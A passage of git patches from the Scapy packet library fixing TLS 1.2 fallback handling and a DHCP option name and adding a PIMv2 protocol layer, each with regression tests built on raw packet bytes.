pkt[AETH].msn == 5 +assert pkt.icrc == 0x25f0c038 From b71d55d993a7d3136c379a600dacc346b8154625 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Tue, 1 Sep 2020 18:21:29 +0000 Subject: [PATCH 0267/1632] Fix #2778: TLS 1.2 server fallback detection Note that TLS 1.2 fallback still IS NOT implemented in the client automaton --- scapy/layers/tls/handshake.py | 54 +++++++++++++++++++++-------------- scapy/layers/tls/record.py | 13 +++++++-- test/run_tests | 11 +++---- test/tls.uts | 7 +++++ 4 files changed, 55 insertions(+), 30 deletions(-) diff --git a/scapy/layers/tls/handshake.py b/scapy/layers/tls/handshake.py index 664729dd601..7a81acde443 100644 --- a/scapy/layers/tls/handshake.py +++ b/scapy/layers/tls/handshake.py @@ -324,7 +324,7 @@ def tls_session_update(self, msg_str): if self.ext: for e in self.ext: if isinstance(e, TLS_Ext_SupportedVersion_CH): - for ver in e.versions: + for ver in sorted(e.versions, reverse=True): # RFC 8701: GREASE of TLS will send unknown versions # here. We have to ignore them if ver in _tls_version: @@ -455,7 +455,7 @@ def tls_session_update(self, msg_str): if self.ext: for e in self.ext: if isinstance(e, TLS_Ext_SupportedVersion_CH): - for ver in e.versions: + for ver in sorted(e.versions, reverse=True): # RFC 8701: GREASE of TLS will send unknown versions # here. We have to ignore them if ver in _tls_version: @@ -530,12 +530,15 @@ def tls_session_update(self, msg_str): """ super(TLSServerHello, self).tls_session_update(msg_str) - self.tls_session.tls_version = self.version - self.random_bytes = msg_str[10:38] - self.tls_session.server_random = (struct.pack('!I', - self.gmt_unix_time) + - self.random_bytes) - self.tls_session.sid = self.sid + s = self.tls_session + s.tls_version = self.version + if hasattr(self, 'gmt_unix_time'): + self.random_bytes = msg_str[10:38] + s.server_random = (struct.pack('!I', self.gmt_unix_time) + + self.random_bytes) + else: + s.server_random = self.random_bytes + s.sid = self.sid cs_cls = None if self.cipher: @@ -555,15 +558,15 @@ def tls_session_update(self, msg_str): comp_val = 0 comp_cls = _tls_compression_algs_cls[comp_val] - connection_end = self.tls_session.connection_end - self.tls_session.pwcs = writeConnState(ciphersuite=cs_cls, - compression_alg=comp_cls, - connection_end=connection_end, - tls_version=self.version) - self.tls_session.prcs = readConnState(ciphersuite=cs_cls, - compression_alg=comp_cls, - connection_end=connection_end, - tls_version=self.version) + connection_end = s.connection_end + s.pwcs = writeConnState(ciphersuite=cs_cls, + compression_alg=comp_cls, + connection_end=connection_end, + tls_version=self.version) + s.prcs = readConnState(ciphersuite=cs_cls, + compression_alg=comp_cls, + connection_end=connection_end, + tls_version=self.version) _tls_13_server_hello_fields = [ @@ -586,7 +589,7 @@ def tls_session_update(self, msg_str): ] -class TLS13ServerHello(_TLSHandshake): +class TLS13ServerHello(TLSServerHello): """ TLS 1.3 ServerHello """ name = "TLS 1.3 Handshake - Server Hello" fields_desc = _tls_13_server_hello_fields @@ -615,16 +618,23 @@ def tls_session_update(self, msg_str): cipher suite (if recognized), and finally we instantiate the write and read connection states. """ - super(TLS13ServerHello, self).tls_session_update(msg_str) - s = self.tls_session + s.server_random = self.random_bytes + s.ciphersuite = self.cipher + s.tls_version = self.version + # Check extensions if self.ext: for e in self.ext: if isinstance(e, TLS_Ext_SupportedVersion_SH): s.tls_version = e.version break - s.server_random = self.random_bytes - s.ciphersuite = self.cipher + + if s.tls_version < 0x304: + # This means that the server does not support TLS 1.3 and ignored + # the initial TLS 1.3 ClientHello. tls_version has been updated + return TLSServerHello.tls_session_update(self, msg_str) + else: + _TLSHandshake.tls_session_update(self, msg_str) cs_cls = None if self.cipher: diff --git a/scapy/layers/tls/record.py b/scapy/layers/tls/record.py index 09866823bb9..d0031e909cc 100644 --- a/scapy/layers/tls/record.py +++ b/scapy/layers/tls/record.py @@ -93,9 +93,16 @@ def m2i(self, pkt, m): if pkt.type == 22: if len(m) >= 1: msgtype = orb(m[0]) - if ((pkt.tls_session.advertised_tls_version == 0x0304) or - (pkt.tls_session.tls_version and - pkt.tls_session.tls_version == 0x0304)): + # If a version was agreed on by both client and server, + # we use it (tls_session.tls_version) + # Otherwise, if the client advertised for TLS 1.3, we try to + # dissect the following packets (most likely, server hello) + # using TLS 1.3. The serverhello is able to fallback on + # TLS 1.2 if necessary. In any case, this will set the agreed + # version so that all future packets are correct. + if ((pkt.tls_session.advertised_tls_version == 0x0304 and + pkt.tls_session.tls_version is None) or + pkt.tls_session.tls_version == 0x0304): cls = _tls13_handshake_cls.get(msgtype, Raw) else: cls = _tls_handshake_cls.get(msgtype, Raw) diff --git a/test/run_tests b/test/run_tests index cc2f57d215e..3d65a511cb5 100755 --- a/test/run_tests +++ b/test/run_tests @@ -2,16 +2,17 @@ DIR=$(dirname "$0")/.. if [ -z "$PYTHON" ] then - ARGS=$(getopt 23 "$*" 2> /dev/null) - for arg in $ARGS + ARGS="" + for arg in "$@" do case $arg in - -2) PYTHON=python2; shift;; - -3) PYTHON=python3; shift;; - --) PYTHON=python3; break;; + -2) PYTHON=python2;; + -3) PYTHON=python3;; + *) ARGS="$ARGS $arg";; esac done + PYTHON=${PYTHON:-python3} fi $PYTHON --version > /dev/null 2>&1 if [ ! $? -eq 0 ] diff --git a/test/tls.uts b/test/tls.uts index 8776910a3b0..d9414a34cbe 100644 --- a/test/tls.uts +++ b/test/tls.uts @@ -1019,6 +1019,7 @@ conf.debug_dissector = old_debug_dissector = Test x25519 dissection in ServerKeyExchange import binascii +from scapy.layers.tls.session import tlsSession session = tlsSession(connection_end="client") # Raw hex data of a TLS Handshake - Server Key Exchange with x25519 elliptic curve @@ -1413,6 +1414,12 @@ assert p.msg[0].extlen is None assert p.msg[0].ext == [] assert [type(x) for x in a.msg] == [TLSServerHello, TLSCertificate, TLSServerKeyExchange, TLSServerHelloDone] += Issue 2778 + +r1 = TLS(b"\x16\x03\x01\x02\x00\x01\x00\x01\xfc\x03\x03\xf8\xb3\xdb\xcbp\xed8\x04\x00\x9c\x15\xafJB\x98r\x06\x19\xb7\r\x1a\xd4\xf2M\x0e\x99\xde\x9e\x93\xce<; \x1c;,\xf3&k\xcb\xa1\x9b)G\x9e\xc6o\xe8\x15\xf7\xdb\nk\x97a\x11\xf7\tX9^z\xee\xba\xba\x00>\x13\x02\x13\x03\x13\x01\xc0,\xc00\x00\x9f\xcc\xa9\xcc\xa8\xcc\xaa\xc0+\xc0/\x00\x9e\xc0$\xc0(\x00k\xc0#\xc0'\x00g\xc0\n\xc0\x14\x009\xc0\t\xc0\x13\x003\x00\x9d\x00\x9c\x00=\x00<\x005\x00/\x00\xff\x01\x00\x01u\x00\x0b\x00\x04\x03\x00\x01\x02\x00\n\x00\x0c\x00\n\x00\x1d\x00\x17\x00\x1e\x00\x19\x00\x183t\x00\x00\x00\x10\x00\x0e\x00\x0c\x02h2\x08http/1.1\x00\x16\x00\x00\x00\x17\x00\x00\x001\x00\x00\x00\r\x00*\x00(\x04\x03\x05\x03\x06\x03\x08\x07\x08\x08\x08\t\x08\n\x08\x0b\x08\x04\x08\x05\x08\x06\x04\x01\x05\x01\x06\x01\x03\x03\x03\x01\x03\x02\x04\x02\x05\x02\x06\x02\x00+\x00\x05\x04\x03\x04\x03\x03\x00-\x00\x02\x01\x01\x003\x00&\x00$\x00\x1d\x00 \xe8A\x0fZ\xb0\x9d\x96\xb0_\x10\x18<\xcd\x9e\x93\xa0W\xa72\x90\xb4\xc9\xe1\xc2T\xcd\xfc)\x9f\xc0\x1dA\x00\x15\x00\xd0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00") +r2 = TLS(b'\x16\x03\x03\x00U\x02\x00\x00Q\x03\x03 \xa5@2G~\xa3\xa9c\xb8\xa7\x00\t\x04Y\xf1\x1f\x1fJ\xd1\x89n\x1dut[~+\xdcQ\xdd\xe0 \x06\x00\xf5R\xdblQ\xb9z0\x97\x17\xff\x84{\xb6\xe8\xfe\xf1\xce&\x01TD\x13\xfd\xa7\xb6`u\xb8\x87\x00\x9d\x00\x00\t\xff\x01\x00\x01\x00\x00\x17\x00\x00\x16\x03\x03\x03n\x0b\x00\x03j\x00\x03g\x00\x03d0\x82\x03`0\x82\x02H\xa0\x03\x02\x01\x02\x02\t\x00\xebs\xb7\x1c>/\x9f\xdc0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x0b\x05\x000E1\x0b0\t\x06\x03U\x04\x06\x13\x02AU1\x130\x11\x06\x03U\x04\x08\x0c\nSome-State1!0\x1f\x06\x03U\x04\n\x0c\x18Internet Widgits Pty Ltd0\x1e\x17\r190215151403Z\x17\r290212151403Z0E1\x0b0\t\x06\x03U\x04\x06\x13\x02AU1\x130\x11\x06\x03U\x04\x08\x0c\nSome-State1!0\x1f\x06\x03U\x04\n\x0c\x18Internet Widgits Pty Ltd0\x82\x01"0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x01\x05\x00\x03\x82\x01\x0f\x000\x82\x01\n\x02\x82\x01\x01\x00\xd2\xf7\xd3k#:V\x196\x8f\xc3\xa7\xdb\x0f#d\xdcq\x98m\xd4\xee\xbc\xbe\xe8[x>\x13\x9c\xfe\xb0\xa8\r\xe5\x01G\xc96\xaa\x84#\x0e/\xa2\xeb\x91\xef\x177A\x03\x87\xb92D\n\xc7\xcf\xda\xff~\xca,yMq<\x13\xf8\x0c\xd5?\x84z\xa1\x96\xd0\xad\xc0D\x94y\nb\x8e2\x7fKS\xd0[\x83\x02\\>\xa5A\x19_\x95<\xe6\xfc7\xed\xcch\xa8\xfdn\xcab\x1f8\xbc\x08\xbc-\x8dr\xcf\xcd\xf8\\h\xf9\xf4\xf4H[2\x13zh_ <\r\xb8\xe0\xff\x1d\x1aY\x91\xd2\xf0X\xf4\x8f \xb1\n_\xb0\xdf\'\xa1\xf9\x87L\xc0\xfe\x8dn\xbfw\xe9\xa7\xba8I\x0e\x9dc$\x1a\x0f\xb3\xfdw\x01\xff;\x13\x0c\x9a\xa7\xaaww\x02\x80\xb7\x00<\x1b\xb5\xe0xL4\xaa\xcbt\xce\x81\x14\x96\x0eP\xee\xe0F\x02\xa7\xab \xe5\xc8x\x02\x8eB\x92\xe9\x0e@\xfdc\x1f\xee\x16\x03\x03\x00\x04\x0e\x00\x00\x00', tls_session=r1.tls_session.mirror()) +assert r2.tls_session.tls_version == 0x303 + ############################################################################### ############################ Automaton behaviour ############################## ############################################################################### From cae03fcf56054acdc77da6e79169f353891ffaa3 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sat, 5 Sep 2020 17:07:24 +0000 Subject: [PATCH 0268/1632] Fix DHCP typo --- scapy/layers/dhcp.py | 2 +- test/regression.uts | 8 ++++++++ 2 files changed, 9 insertions(+), 1 deletion(-) diff --git a/scapy/layers/dhcp.py b/scapy/layers/dhcp.py index 77d9bcdef82..d4afa5290dc 100644 --- a/scapy/layers/dhcp.py +++ b/scapy/layers/dhcp.py @@ -156,7 +156,7 @@ def getfield(self, pkt, s): 43: "vendor_specific", 44: IPField("NetBIOS_server", "0.0.0.0"), 45: IPField("NetBIOS_dist_server", "0.0.0.0"), - 46: ByteField("static-routes", 100), + 46: ByteField("NetBIOS_node_type", 100), 47: "netbios-scope", 48: IPField("font-servers", "0.0.0.0"), 49: IPField("x-display-manager", "0.0.0.0"), diff --git a/test/regression.uts b/test/regression.uts index f74535d6df5..72b3e0366f7 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -12124,6 +12124,14 @@ assert p3[DHCP].options[4] == ("max_dgram_reass_size", 120) assert p3[DHCP].options[5] == ("pxelinux_path_prefix", b'/some/path') assert p3[DHCP].options[6] == "end" += DHCPOptions + +# Issue #2786 + +assert DHCPOptions[33].name == "static-routes" +assert DHCPOptions[46].name == "NetBIOS_node_type" +assert DHCPRevOptions['static-routes'][0] == 33 + ############ ############ + 802.11 From 6e205b21608f1672a01ce2e186526fd117ac7397 Mon Sep 17 00:00:00 2001 From: engineer-km Date: Wed, 12 Aug 2020 22:44:03 +0900 Subject: [PATCH 0269/1632] Add PIMv2 support --- scapy/contrib/pim.py | 253 +++++++++++++++++++++++++++++++++++++++++++ test/contrib/pim.uts | 128 ++++++++++++++++++++++ 2 files changed, 381 insertions(+) create mode 100644 scapy/contrib/pim.py create mode 100644 test/contrib/pim.uts diff --git a/scapy/contrib/pim.py b/scapy/contrib/pim.py new file mode 100644 index 00000000000..42f3d549369 --- /dev/null +++ b/scapy/contrib/pim.py @@ -0,0 +1,253 @@ +# This file is part of Scapy +# Scapy is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 2 of the License, or +# any later version. +# +# Scapy is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with Scapy. If not, see . +# +# scapy.contrib.description = Protocol Independent Multicast (PIM) +# scapy.contrib.status = loads +""" +References: + - https://tools.ietf.org/html/rfc4601 + - https://www.iana.org/assignments/pim-parameters/pim-parameters.xhtml +""" +import struct +from scapy.packet import Packet, bind_layers +from scapy.fields import BitFieldLenField, BitField, BitEnumField, ByteField, \ + ShortField, XShortField, IPField, PacketListField, \ + IntField, FieldLenField, BoundStrLenField, FlagsField +from scapy.layers.inet import IP +from scapy.utils import checksum +from scapy.compat import orb +from scapy.config import conf +from scapy.volatile import RandInt + + +PIM_TYPE = { + 0: "Hello", + 1: "Register", + 2: "Register-Stop", + 3: "Join/Prune", + 4: "Bootstrap", + 5: "Assert", + 6: "Graft", + 7: "Graft-Ack", + 8: "Candidate-RP-Advertisement" +} + + +class PIMv2Hdr(Packet): + name = "Protocol Independent Multicast Version 2 Header" + fields_desc = [BitField("version", 2, 4), + BitEnumField("type", 0, 4, PIM_TYPE), + ByteField("reserved", 0), + XShortField("chksum", None)] + + def post_build(self, p, pay): + """ + Called implicitly before a packet is sent to compute and + place PIM checksum. + + Parameters: + self The instantiation of an PIMv2Hdr class + p The PIMv2Hdr message in hex in network byte order + pay Additional payload for the PIMv2Hdr message + """ + p += pay + if self.chksum is None: + ck = checksum(p) + p = p[:2] + struct.pack("!H", ck) + p[4:] + return p + + +def _guess_pim_tlv_class(h_classes, default_key, pkt, **kargs): + cls = conf.raw_layer + if len(pkt) >= 2: + tlvtype = orb(pkt[1]) + cls = h_classes.get(tlvtype, default_key) + return cls(pkt, **kargs) + + +class _PIMGenericTlvBase(Packet): + fields_desc = [ByteField("type", 0), + FieldLenField("length", None, length_of="value", fmt="B"), + BoundStrLenField("value", "", + length_from=lambda pkt: pkt.length)] + + def guess_payload_class(self, p): + return conf.padding_layer + + def extract_padding(self, s): + return "", s + + +################################## +# PIMv2 Hello +################################## +class _PIMv2GenericHello(_PIMGenericTlvBase): + name = "PIMv2 Generic Hello" + + +def _guess_pimv2_hello_class(p, **kargs): + return _guess_pim_tlv_class(PIMv2_HELLO_CLASSES, None, p, **kargs) + + +class _PIMv2HelloListField(PacketListField): + def __init__(self): + PacketListField.__init__(self, "option", [], _guess_pimv2_hello_class) + + +class PIMv2Hello(Packet): + name = "PIMv2 Hello Options" + fields_desc = [ + _PIMv2HelloListField() + ] + + +class PIMv2HelloHoldtime(_PIMv2GenericHello): + name = "PIMv2 Hello Options : Holdtime" + fields_desc = [ + ShortField("type", 1), + FieldLenField("length", None, length_of="holdtime", fmt="!H"), + ShortField("holdtime", 105) + ] + + +class PIMv2HelloLANPruneDelayValue(_PIMv2GenericHello): + name = "PIMv2 Hello Options : LAN Prune Delay Value" + fields_desc = [ + FlagsField("t", 0, 1, [0, 1]), + BitField("propagation_delay", 500, 15), + ShortField("override_interval", 2500), + ] + + +class PIMv2HelloLANPruneDelay(_PIMv2GenericHello): + name = "PIMv2 Hello Options : LAN Prune Delay" + fields_desc = [ + ShortField("type", 2), + FieldLenField("length", None, length_of="value", fmt="!H"), + PacketListField("value", PIMv2HelloLANPruneDelayValue(), + PIMv2HelloLANPruneDelayValue, + length_from=lambda pkt: pkt.length) + ] + + +class PIMv2HelloDRPriority(_PIMv2GenericHello): + name = "PIMv2 Hello Options : DR Priority" + fields_desc = [ + ShortField("type", 19), + FieldLenField("length", None, length_of="dr_priority", fmt="!H"), + IntField("dr_priority", 1) + ] + + +class PIMv2HelloGenerationID(_PIMv2GenericHello): + name = "PIMv2 Hello Options : Generation ID" + fields_desc = [ + ShortField("type", 20), + FieldLenField( + "length", None, length_of="generation_id", fmt="!H" + ), + IntField("generation_id", RandInt()) + ] + + +class PIMv2HelloStateRefreshValue(_PIMv2GenericHello): + name = "PIMv2 Hello Options : State-Refresh Value" + fields_desc = [ByteField("version", 1), + ByteField("interval", 0), + ShortField("reserved", 0)] + + +class PIMv2HelloStateRefresh(_PIMv2GenericHello): + name = "PIMv2 Hello Options : State-Refresh" + fields_desc = [ + ShortField("type", 21), + FieldLenField( + "length", None, length_of="value", fmt="!H" + ), + PacketListField("value", PIMv2HelloStateRefreshValue(), + PIMv2HelloStateRefreshValue) + ] + + +PIMv2_HELLO_CLASSES = { + 1: PIMv2HelloHoldtime, + 2: PIMv2HelloLANPruneDelay, + 19: PIMv2HelloDRPriority, + 20: PIMv2HelloGenerationID, + 21: PIMv2HelloStateRefresh, + None: _PIMv2GenericHello, +} + + +################################## +# PIMv2 Join/Prune +################################## +class PIMv2JoinPruneAddrsBase(_PIMGenericTlvBase): + fields_desc = [ + ByteField("addr_family", 1), + ByteField("encoding_type", 0), + BitField("rsrvd", 0, 5), + BitField("sparse", 0, 1), + BitField("wildcard", 0, 1), + BitField("rpt", 1, 1), + ByteField("mask_len", 32), + IPField("src_ip", "0.0.0.0") + + ] + + +class PIMv2JoinAddrs(PIMv2JoinPruneAddrsBase): + name = "PIMv2 Join: Source Address" + + +class PIMv2PruneAddrs(PIMv2JoinPruneAddrsBase): + name = "PIMv2 Prune: Source Address" + + +class PIMv2GroupAddrs(_PIMGenericTlvBase): + name = "PIMv2 Join/Prune: Multicast Group Address" + fields_desc = [ + ByteField("addr_family", 1), + ByteField("encoding_type", 0), + BitField("bidirection", 0, 1), + BitField("reserved", 0, 6), + BitField("admin_scope_zone", 0, 1), + ByteField("mask_len", 32), + IPField("gaddr", "0.0.0.0"), + BitFieldLenField("num_joins", None, size=16, count_of="join_ips"), + BitFieldLenField("num_prunes", None, size=16, count_of="prune_ips"), + PacketListField("join_ips", [], PIMv2JoinAddrs, + count_from=lambda x: x.num_joins), + PacketListField("prune_ips", [], PIMv2PruneAddrs, + count_from=lambda x: x.num_prunes), + ] + + +class PIMv2JoinPrune(_PIMGenericTlvBase): + name = "PIMv2 Join/Prune Options" + fields_desc = [ + ByteField("up_addr_family", 1), + ByteField("up_encoding_type", 0), + IPField("up_neighbor_ip", "0.0.0.0"), + ByteField("reserved", 0), + FieldLenField("num_group", None, count_of="jp_ips", fmt="B"), + ShortField("holdtime", 210), + PacketListField("jp_ips", [], PIMv2GroupAddrs, + count_from=lambda pkt: pkt.num_group) + ] + + +bind_layers(IP, PIMv2Hdr, proto=103) +bind_layers(PIMv2Hdr, PIMv2Hello, type=0) +bind_layers(PIMv2Hdr, PIMv2JoinPrune, type=3) diff --git a/test/contrib/pim.uts b/test/contrib/pim.uts new file mode 100644 index 00000000000..195c645e6dc --- /dev/null +++ b/test/contrib/pim.uts @@ -0,0 +1,128 @@ +# PIM Related regression tests +# +# Type the following command to launch start the tests: +# $ test/run_tests -P "load_contrib('pim')" -t test/contrib/pim.uts + ++ pim + += PIMv2 Hello - instantiation + +hello_data = b'\x01\x00^\x00\x00\r\x00\xd0\xcb\x00\xba\xe4\x08\x00E\xc0\x00BY\xf9\x00\x00\x01gTe\x15\x15\x15\x15\xe0\x00\x00\r \x00\xa55\x00\x01\x00\x02\x00i\x00\x13\x00\x04\x00\x00\x00\x00\x00\x02\x00\x04\x01\xf4\t\xc4\x00\x14\x00\x04' + +hello_pkt = Ether(hello_data) + +assert (hello_pkt[PIMv2Hdr].version == 2) +assert (hello_pkt[PIMv2Hdr].type == 0) +assert (len(hello_pkt[PIMv2Hello].option) == 4) +assert (hello_pkt[PIMv2Hello].option[0][PIMv2HelloHoldtime].type == 1) +assert (hello_pkt[PIMv2Hello].option[0][PIMv2HelloHoldtime].holdtime == 105) +assert (hello_pkt[PIMv2Hello].option[1][PIMv2HelloDRPriority].type == 19) +assert (hello_pkt[PIMv2Hello].option[1][PIMv2HelloDRPriority].dr_priority == 0) +assert (hello_pkt[PIMv2Hello].option[2][PIMv2HelloLANPruneDelay].type == 2) +assert (hello_pkt[PIMv2Hello].option[2][PIMv2HelloLANPruneDelay].value[0][PIMv2HelloLANPruneDelayValue].t == 0) +assert (hello_pkt[PIMv2Hello].option[2][PIMv2HelloLANPruneDelay].value[0][PIMv2HelloLANPruneDelayValue].propagation_delay == 500) +assert (hello_pkt[PIMv2Hello].option[2][PIMv2HelloLANPruneDelay].value[0][PIMv2HelloLANPruneDelayValue].override_interval == 2500) +assert (hello_pkt[PIMv2Hello].option[3][PIMv2HelloGenerationID].type == 20) + += PIMv2 Join/Prune - instantiation + +jp_data = b'\x01\x00^\x00\x00\r\x00\xd0\xcb\x00\xba\xe4\x08\x00E\xc0\x00rY\xfb\x00\x00\x01gT3\x15\x15\x15\x15\xe0\x00\x00\r#\x00\x1b\x18\x01\x00\x15\x15\x15\x16\x00\x04\x00\xd2\x01\x00\x00 \xef\x01\x01\x0b\x00\x01\x00\x00\x01\x00\x07 \x16\x16\x16\x15\x01\x00\x00 \xef\x01\x01\x0c\x00\x01\x00\x00\x01\x00\x07 \x16\x16\x16\x15\x01\x00\x00 \xef\x01\x01\x0b\x00\x00\x00\x01\x01\x00\x07 \x16\x16\x16\x15\x01\x00\x00 \xef\x01\x01\x0c\x00\x00\x00\x01\x01\x00\x07 \x16\x16\x16\x15' + +jp_pkt = Ether(jp_data) + +assert (jp_pkt[PIMv2Hdr].version == 2) +assert (jp_pkt[PIMv2Hdr].type == 3) +assert (jp_pkt[PIMv2JoinPrune].up_addr_family == 1) +assert (jp_pkt[PIMv2JoinPrune].up_encoding_type == 0) +assert (jp_pkt[PIMv2JoinPrune].up_neighbor_ip == "21.21.21.22") +assert (jp_pkt[PIMv2JoinPrune].reserved == 0) +assert (jp_pkt[PIMv2JoinPrune].num_group == 4) +assert (jp_pkt[PIMv2JoinPrune].holdtime == 210) +assert (jp_pkt[PIMv2JoinPrune].num_group == len(jp_pkt[PIMv2JoinPrune].jp_ips)) +assert (jp_pkt[PIMv2JoinPrune].jp_ips[0].addr_family == 1) +assert (jp_pkt[PIMv2JoinPrune].jp_ips[0].encoding_type == 0) +assert (jp_pkt[PIMv2JoinPrune].jp_ips[0].bidirection == 0) +assert (jp_pkt[PIMv2JoinPrune].jp_ips[0].reserved == 0) +assert (jp_pkt[PIMv2JoinPrune].jp_ips[0].admin_scope_zone == 0) +assert (jp_pkt[PIMv2JoinPrune].jp_ips[0].mask_len == 32) +assert (jp_pkt[PIMv2JoinPrune].jp_ips[0].gaddr == "239.1.1.11") +assert (jp_pkt[PIMv2JoinPrune].jp_ips[0].num_joins == 1) +assert (jp_pkt[PIMv2JoinPrune].jp_ips[0].num_joins == len(jp_pkt[PIMv2JoinPrune].jp_ips[0].join_ips)) +assert (jp_pkt[PIMv2JoinPrune].jp_ips[0].join_ips[0][PIMv2JoinAddrs].addr_family == 1) +assert (jp_pkt[PIMv2JoinPrune].jp_ips[0].join_ips[0][PIMv2JoinAddrs].encoding_type == 0) +assert (jp_pkt[PIMv2JoinPrune].jp_ips[0].join_ips[0][PIMv2JoinAddrs].rsrvd == 0) +assert (jp_pkt[PIMv2JoinPrune].jp_ips[0].join_ips[0][PIMv2JoinAddrs].sparse == 1) +assert (jp_pkt[PIMv2JoinPrune].jp_ips[0].join_ips[0][PIMv2JoinAddrs].wildcard == 1) +assert (jp_pkt[PIMv2JoinPrune].jp_ips[0].join_ips[0][PIMv2JoinAddrs].rpt == 1) +assert (jp_pkt[PIMv2JoinPrune].jp_ips[0].join_ips[0][PIMv2JoinAddrs].mask_len == 32) +assert (jp_pkt[PIMv2JoinPrune].jp_ips[0].join_ips[0][PIMv2JoinAddrs].src_ip == "22.22.22.21") +assert (jp_pkt[PIMv2JoinPrune].jp_ips[0].num_prunes == 0) +assert (jp_pkt[PIMv2JoinPrune].jp_ips[0].num_prunes == len(jp_pkt[PIMv2JoinPrune].jp_ips[0].prune_ips)) +assert (jp_pkt[PIMv2JoinPrune].jp_ips[2].addr_family == 1) +assert (jp_pkt[PIMv2JoinPrune].jp_ips[2].encoding_type == 0) +assert (jp_pkt[PIMv2JoinPrune].jp_ips[2].bidirection == 0) +assert (jp_pkt[PIMv2JoinPrune].jp_ips[2].reserved == 0) +assert (jp_pkt[PIMv2JoinPrune].jp_ips[2].admin_scope_zone == 0) +assert (jp_pkt[PIMv2JoinPrune].jp_ips[2].mask_len == 32) +assert (jp_pkt[PIMv2JoinPrune].jp_ips[2].gaddr == "239.1.1.11") +assert (jp_pkt[PIMv2JoinPrune].jp_ips[2].num_joins == 0) +assert (jp_pkt[PIMv2JoinPrune].jp_ips[2].num_joins == len(jp_pkt[PIMv2JoinPrune].jp_ips[2].join_ips)) +assert (jp_pkt[PIMv2JoinPrune].jp_ips[2].num_prunes == 1) +assert (jp_pkt[PIMv2JoinPrune].jp_ips[2].num_prunes == len(jp_pkt[PIMv2JoinPrune].jp_ips[2].prune_ips)) +assert (jp_pkt[PIMv2JoinPrune].jp_ips[2].prune_ips[0][PIMv2PruneAddrs].addr_family == 1) +assert (jp_pkt[PIMv2JoinPrune].jp_ips[2].prune_ips[0][PIMv2PruneAddrs].encoding_type == 0) +assert (jp_pkt[PIMv2JoinPrune].jp_ips[2].prune_ips[0][PIMv2PruneAddrs].rsrvd == 0) +assert (jp_pkt[PIMv2JoinPrune].jp_ips[2].prune_ips[0][PIMv2PruneAddrs].sparse == 1) +assert (jp_pkt[PIMv2JoinPrune].jp_ips[2].prune_ips[0][PIMv2PruneAddrs].wildcard == 1) +assert (jp_pkt[PIMv2JoinPrune].jp_ips[2].prune_ips[0][PIMv2PruneAddrs].rpt == 1) +assert (jp_pkt[PIMv2JoinPrune].jp_ips[2].prune_ips[0][PIMv2PruneAddrs].mask_len == 32) +assert (jp_pkt[PIMv2JoinPrune].jp_ips[2].prune_ips[0][PIMv2PruneAddrs].src_ip == "22.22.22.21") + += PIMv2 Hello - build + +hello_delay_pkt = Ether(dst="01:00:5e:00:00:0d", src="00:d0:cb:00:ba:e4")/IP(version=4, ihl=5, tos=0xc0, id=23037, ttl=1, proto=103, src="21.21.21.21", dst="224.0.0.13")/\ + PIMv2Hdr(version=2, type=0, reserved=0)/\ + PIMv2Hello(option=[PIMv2HelloHoldtime(type=1, holdtime=105), PIMv2HelloDRPriority(type=19, dr_priority=0), + PIMv2HelloLANPruneDelay(type=2, value=[PIMv2HelloLANPruneDelayValue(t=0, propagation_delay=500, override_interval=2500)]), + PIMv2HelloGenerationID(type=20, generation_id=459007194)]) + +assert raw(hello_delay_pkt) == b'\x01\x00^\x00\x00\r\x00\xd0\xcb\x00\xba\xe4\x08\x00E\xc0\x006Y\xfd\x00\x00\x01gTm\x15\x15\x15\x15\xe0\x00\x00\r \x00\xd3p\x00\x01\x00\x02\x00i\x00\x13\x00\x04\x00\x00\x00\x00\x00\x02\x00\x04\x01\xf4\t\xc4\x00\x14\x00\x04\x1b[\xe4\xda' + +hello_refresh_pkt = Ether(dst="01:00:5e:00:00:0d", src="c2:01:52:72:00:00")/IP(version=4, ihl=5, tos=0xc0, id=121, ttl=1, proto=103, src="10.0.0.1", dst="224.0.0.13")/\ + PIMv2Hdr(version=2, type=0, reserved=0)/\ + PIMv2Hello(option=[PIMv2HelloHoldtime(type=1, holdtime=105), PIMv2HelloGenerationID(type=20, generation_id=3613938422), + PIMv2HelloDRPriority(type=19, dr_priority=1), + PIMv2HelloStateRefresh(type=21, value=[PIMv2HelloStateRefreshValue(version=1, interval=0, reserved=0)])]) + +assert raw(hello_refresh_pkt) == b'\x01\x00^\x00\x00\r\xc2\x01Rr\x00\x00\x08\x00E\xc0\x006\x00y\x00\x00\x01g\xce\x1a\n\x00\x00\x01\xe0\x00\x00\r \x00\xb3\xeb\x00\x01\x00\x02\x00i\x00\x14\x00\x04\xd7hR\xf6\x00\x13\x00\x04\x00\x00\x00\x01\x00\x15\x00\x04\x01\x00\x00\x00' + += PIMv2 Join/Prune - build + +join_pkt = Ether(dst="01:00:5e:00:00:0d", src="c2:02:3d:80:00:01")/IP(version=4, ihl=5, tos=0xc0, id=139, ttl=1, 